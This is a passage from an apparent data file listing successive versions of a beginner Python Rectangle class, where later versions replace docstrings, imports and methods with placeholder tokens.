{}/{}\".format(self.__class__.__name__,\n self.id, self.x, self.y,\n self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator(\"width\", value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator(\"height\", value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator(\"x\", value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y attribute with exceptions \"\"\"\n self.data_validator(\"y\", value)\n self.__y = value\n",
"<docstring token>\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" Defines attributes and methods of Rectangle class \"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y attribute with exceptions \"\"\"\n self.data_validator('y', value)\n self.__y = value\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n \"\"\" Defines attributes and methods of Rectangle class \"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y attribute with exceptions \"\"\"\n self.data_validator('y', value)\n self.__y = value\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y attribute with exceptions \"\"\"\n self.data_validator('y', value)\n self.__y = value\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n\n @property\n def width(self):\n \"\"\" Gets private width attribute \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height attribute with exceptions \"\"\"\n self.data_validator('height', value)\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n\n @property\n def x(self):\n \"\"\" Gets private x attribute \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x attribute with exceptions \"\"\"\n self.data_validator('x', value)\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n\n @property\n def y(self):\n \"\"\" Gets private y attribute \"\"\"\n return self.__y\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return '[{}] ({}) {}/{} - {}/{}'.format(self.__class__.__name__,\n self.id, self.x, self.y, self.width, self.height)\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width attribute with exceptions \"\"\"\n self.data_validator('width', value)\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError('{} must be an integer'.format(name))\n if name == 'height' or name == 'width':\n if value <= 0:\n raise ValueError('{} must be > 0'.format(name))\n elif value < 0:\n raise ValueError('{} must be >= 0'.format(name))\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n <function token>\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n\n\nclass Rectangle(Base):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(' ', end='')\n for row in range(self.width):\n print('#', end='')\n print()\n <function token>\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect['id'] = self.id\n dict_rect['width'] = self.width\n dict_rect['height'] = self.height\n dict_rect['x'] = self.x\n dict_rect['y'] = self.y\n return dict_rect\n <function token>\n <function token>\n <function token>\n\n @property\n def height(self):\n \"\"\" Gets private height attribute \"\"\"\n return self.__height\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
